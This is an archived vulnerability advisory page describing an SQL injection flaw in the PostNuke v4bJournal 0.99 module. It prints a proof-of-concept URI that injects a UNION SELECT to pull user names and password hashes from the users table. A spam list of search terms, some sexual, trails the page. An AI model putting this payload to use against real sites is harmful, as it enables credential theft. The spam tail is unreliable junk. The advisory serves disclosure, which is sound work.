about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PostNuke v4bJournal Module PHP SQL Injection Vulnerability


Title PostNuke v4bJournal Module PHP SQL Injection Vulnerability
Published 2007-05-02-12:00AM
Updated 2007-05-03-05:29PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Ali Abbasi is credited with the discovery of this vulnerability.
Vulnerable  PostNuke v4bJournal module 0.99
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/
**/from/**/nuke_users/**/where/**/pn_uid=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 13:49:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.7ooxxx phpsecurit Searching news for c Hot+and+se t53t Beta-brows age 18 SEXY WOMA components opera for Joel Eriks Www.arabo. shop369993 port 7212 gameguad search/exp smartmovie Bavana sex www.trish www.gzsang www.qwb.ne php-nuke 2 News Searc phpsecurit dic news for c Sunshop sex yy Baby sex p www..playb www.yzrdkj wwwsex@com www.ibagjp www.hsqclg smart movi di 624s Pakistani www.sexbra http:www.k php-nuke 2 /search/ex btitracker dogsex.com health.cho mambo Remo mambo Remo download+v sex.englis sexy fhoto